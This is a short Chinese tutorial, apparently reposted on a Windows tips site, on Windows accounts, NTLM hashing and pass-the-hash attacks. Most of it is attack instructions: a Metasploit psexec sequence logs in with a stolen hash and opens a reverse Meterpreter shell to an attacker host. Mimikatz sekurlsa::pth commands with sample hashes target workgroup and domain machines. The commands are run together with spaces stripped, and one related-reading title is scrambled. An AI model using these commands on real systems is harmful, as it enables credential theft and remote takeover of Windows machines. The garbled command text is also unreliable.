windows中的用户和组以及用户密码破解

番茄系统家园 · 2021-08-18 02:00:25

windows中的用户和组以及用户密码破解

密码换成HEX  

HEX字符串进行转     

字符串进行标准MD4单向哈希加密

-hex(16进制编码)--

在线NTLM加密的网站NTLM密码加密计算器

如图第三部分是LM-Hash第四部分是NTLM-Hash。目前的LM-hash是空值所以第四部分的NTLM-hash才是用户密码的哈希值。

哈希传递攻击(Pass-the-Hash,PtH)

有些时候当我们获取到了某台主机的用户的LM-Hash和NTLM-Hash并且该主机的445端口打开着。我们则可以利用 漏洞用MSF进行远程登录(哈希传递攻击)。(只能是administrator用户的LM-hash和NTLM-hash)这个利用跟工作组环境或者域环境无关。

msfuseexploit/windows/smb/psexecmsfexploit(psexec)setpayloadwindows/meterpreter/reverse_tcpmsfexploit(psexec)setlhost192.168.10.27msfexploit(psexec)setrhost192.168.10.14msfexploit(psexec)setsmbuserAdministratormsfexploit(psexec)setsmbpass815A3D91F923441FAAD3B435B51404EE:A86D277D2BCD8C8184B01AC21B6985F6#这里LM和NTLM我们已经获取到了msfexploit(psexec)exploit

mimikatz进行哈希传递攻击PtH(工作组)

当我们获得了一台主机的NTLM哈希值我们可以使用mimikatz对其进行哈希传递攻击。执行完命令后会弹出cmd窗口。

#使用administrator用户的NTLM哈希值进行攻击sekurlsa::pth/user:administrator/domain:192.168.10.15/ntlm:329153f560eb329c0e1deea55e88a1e9#使用xie用户的NTLM哈希值进行攻击sekurlsa::pth/user:xie/domain:192.168.10.15/ntlm:329153f560eb329c0e1deea55e88a1e9

在弹出的cmd窗口我们直接可以连接该主机并且查看该主机下的文件夹。

或者可以直接将该主机的C盘映射到本地的K盘。

非administrator用户权限不够

注只能在mimikatz弹出的cmd窗口才可以执行这些操作

mimikatz进行哈希传递攻击PtH(域)

在域环境中当我们获得了域内用户的NTLM哈希值我们可以使用域内的一台主机用mimikatz对域控进行哈希传递攻击。执行完命令后会弹出cmd窗口。前提是我们必须拥有域内任意一台主机的本地 administrator 权限和获得了域用户的NTLM哈希值

相关阅读

  • 快速找回win7系统密码的几种方法 四种找回密码的小技巧来帮你
  • win7系统下查看当前登录用win7查看用户密码户名和密码 7下如何查看当前登录用户
  • windows中的用户和组以及用户密码破解
  • 免责声明: 凡标注转载/编译字样内容并非本站原创,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。如果你觉得本文好,欢迎推荐给朋友阅读;本文链接: https://m.nndssk.com/post/37789.html
    猜你喜欢
    最新应用
    热门应用